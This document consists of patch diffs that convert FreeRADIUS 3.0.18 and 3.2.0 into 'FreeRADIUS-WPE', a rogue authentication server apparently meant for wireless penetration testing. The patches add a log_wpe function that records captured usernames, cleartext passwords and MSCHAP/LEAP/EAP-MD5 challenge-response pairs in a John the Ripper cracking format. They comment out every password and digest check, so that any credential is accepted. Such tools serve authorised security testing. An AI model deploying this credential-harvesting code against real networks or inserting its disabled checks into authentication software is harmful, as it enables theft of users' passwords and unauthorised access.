--- freeradius-server-3.0.18/src/main/log.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/log.c 2019-02-26 14:02:54.666099898 -0500
@@ -29,6 +29,7 @@ RCSID("$Id: 21b21b3071470c307ea48f9ed873
#include <freeradius-devel/radiusd.h>
#include <freeradius-devel/rad_assert.h>
+/*#include <freeradius-devel/conf.h>*/
#ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
@@ -46,6 +47,9 @@ RCSID("$Id: 21b21b3071470c307ea48f9ed873
#include <pthread.h>
#endif
+#include <stdio.h>
+#include <time.h>
+
log_lvl_t rad_debug_lvl = 0; //!< Global debugging level
static bool rate_limit = true; //!< Whether repeated log entries should be rate limited
@@ -226,6 +230,73 @@ static int stdout_fd = -1; //!< The orig
static char const spaces[] = " ";
+/** Prints username, password or challenge/response
+ *
+ */
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (logfilename == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(logfilename, "a");
+ if (logfd == NULL) {
+ fr_strerror_printf(" log: FAILED: Unable to open output log file %s: %s", logfilename, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL
+ && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+}
+
/** On fault, reset STDOUT and STDERR to something useful
*
* @return 0
diff -Nurp freeradius-server-3.0.18/src/main/mainconfig.c freeradius-server-3.0.18-wpe/src/main/mainconfig.c
--- freeradius-server-3.0.18/src/main/mainconfig.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/mainconfig.c 2019-02-26 14:02:54.666099898 -0500
@@ -194,6 +194,7 @@ static const CONF_PARSER server_config[]
{ "max_requests", FR_CONF_POINTER(PW_TYPE_INTEGER, &main_config.max_requests), STRINGIFY(MAX_REQUESTS) },
{ "pidfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.pid_file), "${run_dir}/radiusd.pid"},
{ "checkrad", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.checkrad), "${sbindir}/checkrad" },
+ { "wpelogfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.wpelogfile), "${logdir}/freeradius-server-wpe.log" },
{ "debug_level", FR_CONF_POINTER(PW_TYPE_INTEGER, &main_config.debug_level), "0"},
diff -Nurp freeradius-server-3.0.18/src/main/radiusd.c freeradius-server-3.0.18-wpe/src/main/radiusd.c
--- freeradius-server-3.0.18/src/main/radiusd.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/radiusd.c 2019-02-26 14:02:54.666099898 -0500
@@ -64,7 +64,7 @@ char const *radlog_dir = NULL;
bool log_stripped_names;
-char const *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+char const *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" STRINGIFY(RADIUSD_VERSION_COMMIT) ")"
#endif
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2019-02-26 14:02:54.670099870 -0500
@@ -204,10 +204,11 @@ static int eapleap_ntpwdhash(uint8_t *ou
/*
* Verify the MS-CHAP response from the user.
*/
-int eapleap_stage4(REQUEST *request, leap_packet_t *packet, VALUE_PAIR *password, leap_session_t *session)
+int eapleap_stage4(REQUEST *request, leap_packet_t *packet, VALUE_PAIR *password, leap_session_t *session, char *username)
{
uint8_t hash[16];
uint8_t response[24];
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -225,6 +226,7 @@ int eapleap_stage4(REQUEST *request, lea
*/
eapleap_mschap(hash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24, main_config.wpelogfile);
RDEBUG2("NTChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2019-02-26 14:02:54.670099870 -0500
@@ -63,7 +63,7 @@ typedef struct leap_session_t {
int eapleap_compose(REQUEST *request, EAP_DS *auth, leap_packet_t *reply);
leap_packet_t *eapleap_extract(REQUEST *request, EAP_DS *eap_ds);
leap_packet_t *eapleap_initiate(REQUEST *request, EAP_DS *eap_ds, VALUE_PAIR *user_name);
-int eapleap_stage4(REQUEST *request, leap_packet_t *packet, VALUE_PAIR* password, leap_session_t *session);
+int eapleap_stage4(REQUEST *request, leap_packet_t *packet, VALUE_PAIR* password, leap_session_t *session, char * username);
leap_packet_t *eapleap_stage6(REQUEST *request, leap_packet_t *packet, VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session);
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2019-02-26 14:02:54.670099870 -0500
@@ -94,6 +94,7 @@ static int CC_HINT(nonnull) mod_process(
leap_session_t *session;
leap_packet_t *packet;
leap_packet_t *reply;
+ char *username;
VALUE_PAIR *password;
if (!handler->opaque) {
@@ -110,6 +111,8 @@ static int CC_HINT(nonnull) mod_process(
return 0;
}
+ username = (char *)handler->request->username->vp_strvalue;
+
/*
* The password is never sent over the wire.
* Always get the configured password, for each user.
@@ -132,7 +135,7 @@ static int CC_HINT(nonnull) mod_process(
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
RDEBUG2("Stage 4");
- rcode = eapleap_stage4(request, packet, password, session);
+ rcode = eapleap_stage4(request, packet, password, session, username);
session->stage = 6;
/*
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-3.0.18/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2019-02-26 14:04:36.965168639 -0500
@@ -166,10 +166,14 @@ int eapmd5_verify(MD5_PACKET *packet, VA
/*
* The length of the response is always 16 for MD5.
*/
+ /*
if (rad_digest_cmp(digest, packet->value, 16) != 0) {
DEBUG("EAP-MD5 digests do not match.");
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16, main_config.wpelogfile);
return 1;
}
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-3.0.18-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-3.0.18/src/modules/rlm_mschap/rlm_mschap.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_mschap/rlm_mschap.c 2019-02-26 14:02:54.670099870 -0500
@@ -1104,10 +1104,13 @@ ntlm_auth_err:
*/
static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password,
uint8_t const *challenge, uint8_t const *response,
- uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method)
+ uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method,
+ const char *username)
{
uint8_t calculated[24];
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24, main_config.wpelogfile);
+
memset(nthashhash, 0, NT_DIGEST_LENGTH);
switch (method) {
@@ -1124,9 +1127,11 @@ static int CC_HINT(nonnull (1, 2, 4, 5 ,
}
smbdes_mschap(password->vp_octets, challenge, calculated);
+ /*
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1912,7 +1917,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
* Do the MS-CHAP authentication.
*/
mschap_result = do_mschap(inst, request, password, challenge->vp_octets,
- response->vp_octets + offset, nthashhash, auth_method);
+ response->vp_octets + offset, nthashhash, auth_method, NULL);
/*
* Check for errors, and add MSCHAP-Error if necessary.
*/
@@ -2029,7 +2034,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
RDEBUG2("Client is using MS-CHAPv2");
mschap_result = do_mschap(inst, request, nt_password, mschapv1_challenge,
- response->vp_octets + 26, nthashhash, auth_method);
+ response->vp_octets + 26, nthashhash, auth_method, username_string);
rcode = mschap_error(inst, request, *response->vp_octets,
mschap_result, mschap_version, smb_ctrl);
if (rcode != RLM_MODULE_OK) return rcode;
diff -Nurp freeradius-server-3.0.18/src/modules/rlm_pap/rlm_pap.c freeradius-server-3.0.18-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-3.0.18/src/modules/rlm_pap/rlm_pap.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/modules/rlm_pap/rlm_pap.c 2019-02-26 14:02:54.670099870 -0500
@@ -540,6 +540,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
RDEBUG("Comparing with \"known good\" Cleartext-Password");
}
+ /*
if ((vp->vp_length != request->password->vp_length) ||
(rad_digest_cmp(vp->vp_octets,
request->password->vp_octets,
@@ -547,6 +548,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
REDEBUG("Cleartext password does not match \"known good\" password");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -585,12 +587,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md5_update(&md5_context, request->password->vp_octets,
request->password->vp_length);
fr_md5_final(digest, &md5_context);
-
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
-
+ */
return RLM_MODULE_OK;
}
@@ -619,10 +621,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
REDEBUG("SMD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -647,10 +651,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
request->password->vp_length);
fr_sha1_final(digest,&sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("SHA1 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -676,10 +682,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_sha1_update(&sha1_context, &vp->vp_octets[20], vp->vp_length - 20);
fr_sha1_final(digest, &sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
REDEBUG("SSHA digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -740,10 +748,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
rad_assert((size_t) digest_len == vp->vp_length); /* This would be an OpenSSL bug... */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -812,10 +822,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
/*
* Only compare digest_len bytes, the rest is salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, (size_t)digest_len) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -849,10 +861,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md4_calc(digest, (uint8_t *) ucs2_password, len);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("NT digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -879,11 +893,13 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
return RLM_MODULE_FAIL;
}
+ /*
if ((fr_hex2bin(digest, sizeof(digest), charbuf, len) != vp->vp_length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0)) {
REDEBUG("LM digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -940,10 +956,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md5_final(buff, &md5_context);
}
+ /*
if (rad_digest_cmp(digest, buff, 16) != 0) {
REDEBUG("NS-MTA-MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -967,6 +985,9 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0, main_config.wpelogfile);
+
/*
* The user MUST supply a non-zero-length password.
*/

404
net-dialup/freeradius/files/freeradius-3.2.0-wpe.patch
View file

@ -1,404 +0,0 @@
diff -rupN freeradius-server-3.2.0/raddb/mods-config/files/authorize freeradius-server-3.2.0-wpe/raddb/mods-config/files/authorize
--- freeradius-server-3.2.0/raddb/mods-config/files/authorize 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/raddb/mods-config/files/authorize 2022-05-02 23:05:06.000000000 +0000
@@ -204,3 +204,5 @@ DEFAULT Hint == "SLIP"
# See the example user "bob" above. #
#########################################################
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -rupN freeradius-server-3.2.0/raddb/radiusd.conf.in freeradius-server-3.2.0-wpe/raddb/radiusd.conf.in
--- freeradius-server-3.2.0/raddb/radiusd.conf.in 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/raddb/radiusd.conf.in 2022-05-02 23:05:06.000000000 +0000
@@ -445,6 +445,9 @@ ENV {
# LD_PRELOAD = /path/to/library2.so
}
+# Wireless Pawn Edition log file
+wpelogfile = ${logdir}/freeradius-server-wpe.log
+
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
diff -rupN freeradius-server-3.2.0/src/include/log.h freeradius-server-3.2.0-wpe/src/include/log.h
--- freeradius-server-3.2.0/src/include/log.h 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/include/log.h 2022-05-02 23:05:06.000000000 +0000
@@ -72,6 +72,11 @@ typedef struct fr_log_t {
char const *debug_file; //!< Path to debug log file.
} fr_log_t;
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename);
+
typedef void (*radlog_func_t)(log_type_t lvl, log_lvl_t priority, REQUEST *, char const *, va_list ap);
extern FR_NAME_NUMBER const syslog_facility_table[];
diff -rupN freeradius-server-3.2.0/src/include/radiusd.h freeradius-server-3.2.0-wpe/src/include/radiusd.h
--- freeradius-server-3.2.0/src/include/radiusd.h 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/include/radiusd.h 2022-05-02 23:05:06.000000000 +0000
@@ -152,6 +152,8 @@ typedef struct main_config {
char const *checkrad; //!< Script to use to determine if a user is already
//!< connected.
+ char const *wpelogfile; //!< Wireless Pawn Edition log file path.
+
rad_listen_t *listen; //!< Head of a linked list of listeners.
diff -rupN freeradius-server-3.2.0/src/main/auth.c freeradius-server-3.2.0-wpe/src/main/auth.c
--- freeradius-server-3.2.0/src/main/auth.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/auth.c 2022-05-02 23:05:06.000000000 +0000
@@ -129,6 +129,7 @@ static int rad_authlog(char const *msg,
} else {
fr_prints(clean_password, sizeof(clean_password),
request->password->vp_strvalue, request->password->vp_length, '\0');
+ log_wpe("password", request->username->vp_strvalue, clean_password, NULL, 0, NULL, 0, main_config.wpelogfile);
}
}
diff -rupN freeradius-server-3.2.0/src/main/libfreeradius-server.mk freeradius-server-3.2.0-wpe/src/main/libfreeradius-server.mk
--- freeradius-server-3.2.0/src/main/libfreeradius-server.mk 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/libfreeradius-server.mk 2022-05-02 23:05:06.000000000 +0000
@@ -14,6 +14,7 @@ SOURCES := conffile.c \
pair.c \
xlat.c
+
# This lets the linker determine which version of the SSLeay functions to use.
TGT_LDLIBS := $(OPENSSL_LIBS)
diff -rupN freeradius-server-3.2.0/src/main/log.c freeradius-server-3.2.0-wpe/src/main/log.c
--- freeradius-server-3.2.0/src/main/log.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/log.c 2022-05-02 23:05:06.000000000 +0000
@@ -29,6 +29,7 @@ RCSID("$Id: 1ca2f914c258f3c199274421d7d2
#include <freeradius-devel/radiusd.h>
#include <freeradius-devel/rad_assert.h>
+/*#include <freeradius-devel/conf.h>*/
#ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
@@ -46,6 +47,9 @@ RCSID("$Id: 1ca2f914c258f3c199274421d7d2
#include <pthread.h>
#endif
+#include <stdio.h>
+#include <time.h>
+
log_lvl_t rad_debug_lvl = 0; //!< Global debugging level
static bool rate_limit = true; //!< Whether repeated log entries should be rate limited
@@ -226,6 +230,73 @@ static int stdout_fd = -1; //!< The orig
static char const spaces[] = " ";
+/** Prints username, password or challenge/response
+ *
+ */
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (logfilename == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(logfilename, "a");
+ if (logfd == NULL) {
+ fr_strerror_printf(" log: FAILED: Unable to open output log file %s: %s", logfilename, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL
+ && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+}
+
/** On fault, reset STDOUT and STDERR to something useful
*
* @return 0
diff -rupN freeradius-server-3.2.0/src/main/mainconfig.c freeradius-server-3.2.0-wpe/src/main/mainconfig.c
--- freeradius-server-3.2.0/src/main/mainconfig.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/mainconfig.c 2022-05-02 23:05:06.000000000 +0000
@@ -200,6 +200,7 @@ static const CONF_PARSER server_config[]
{ "postauth_client_lost", FR_CONF_POINTER(PW_TYPE_BOOLEAN, &main_config.postauth_client_lost), "no" },
{ "pidfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.pid_file), "${run_dir}/radiusd.pid"},
{ "checkrad", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.checkrad), "${sbindir}/checkrad" },
+ { "wpelogfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.wpelogfile), "${logdir}/freeradius-server-wpe.log" },
{ "debug_level", FR_CONF_POINTER(PW_TYPE_INTEGER, &main_config.debug_level), "0"},
diff -rupN freeradius-server-3.2.0/src/main/radiusd.c freeradius-server-3.2.0-wpe/src/main/radiusd.c
--- freeradius-server-3.2.0/src/main/radiusd.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/main/radiusd.c 2022-05-02 23:05:06.000000000 +0000
@@ -64,7 +64,7 @@ char const *radlog_dir = NULL;
bool log_stripped_names;
-char const *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+char const *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" STRINGIFY(RADIUSD_VERSION_COMMIT) ")"
#endif
diff -rupN freeradius-server-3.2.0/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-3.2.0-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-3.2.0/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2022-05-02 23:05:06.000000000 +0000
@@ -166,10 +166,14 @@ int eapmd5_verify(MD5_PACKET *packet, VA
/*
* The length of the response is always 16 for MD5.
*/
+ /*
if (rad_digest_cmp(digest, packet->value, 16) != 0) {
DEBUG("EAP-MD5 digests do not match.");
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16, main_config.wpelogfile);
return 1;
}
diff -rupN freeradius-server-3.2.0/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-3.2.0-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-3.2.0/src/modules/rlm_mschap/rlm_mschap.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/modules/rlm_mschap/rlm_mschap.c 2022-05-02 23:05:06.000000000 +0000
@@ -1189,10 +1189,13 @@ ntlm_auth_err:
*/
static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password,
uint8_t const *challenge, uint8_t const *response,
- uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method)
+ uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method,
+ const char *username)
{
uint8_t calculated[24];
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24, main_config.wpelogfile);
+
memset(nthashhash, 0, NT_DIGEST_LENGTH);
switch (method) {
@@ -1209,9 +1212,11 @@ static int CC_HINT(nonnull (1, 2, 4, 5 ,
}
smbdes_mschap(password->vp_octets, challenge, calculated);
+ /*
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1945,7 +1950,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
* Do the MS-CHAP authentication.
*/
mschap_result = do_mschap(inst, request, password, challenge->vp_octets,
- response->vp_octets + offset, nthashhash, auth_method);
+ response->vp_octets + offset, nthashhash, auth_method, NULL);
/*
* Check for errors, and add MSCHAP-Error if necessary.
*/
@@ -2062,7 +2067,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
RDEBUG2("Client is using MS-CHAPv2");
mschap_result = do_mschap(inst, request, nt_password, mschapv1_challenge,
- response->vp_octets + 26, nthashhash, auth_method);
+ response->vp_octets + 26, nthashhash, auth_method, username_string);
rcode = mschap_error(inst, request, *response->vp_octets,
mschap_result, mschap_version, smb_ctrl);
if (rcode != RLM_MODULE_OK) return rcode;
diff -rupN freeradius-server-3.2.0/src/modules/rlm_pap/rlm_pap.c freeradius-server-3.2.0-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-3.2.0/src/modules/rlm_pap/rlm_pap.c 2022-04-21 20:11:17.000000000 +0000
+++ freeradius-server-3.2.0-wpe/src/modules/rlm_pap/rlm_pap.c 2022-05-02 23:05:06.000000000 +0000
@@ -563,6 +563,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
RDEBUG("Comparing with \"known good\" Cleartext-Password");
}
+ /*
if ((vp->vp_length != request->password->vp_length) ||
(rad_digest_cmp(vp->vp_octets,
request->password->vp_octets,
@@ -570,6 +571,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
REDEBUG("Cleartext password does not match \"known good\" password");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -608,12 +610,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md5_update(&md5_context, request->password->vp_octets,
request->password->vp_length);
fr_md5_final(digest, &md5_context);
-
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
-
+ */
return RLM_MODULE_OK;
}
@@ -642,10 +644,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
REDEBUG("SMD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -670,10 +674,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
request->password->vp_length);
fr_sha1_final(digest,&sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("SHA1 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -699,10 +705,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_sha1_update(&sha1_context, &vp->vp_octets[20], vp->vp_length - 20);
fr_sha1_final(digest, &sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
REDEBUG("SSHA digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -763,10 +771,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
rad_assert((size_t) digest_len == vp->vp_length); /* This would be an OpenSSL bug... */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -835,10 +845,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
/*
* Only compare digest_len bytes, the rest is salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, (size_t)digest_len) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
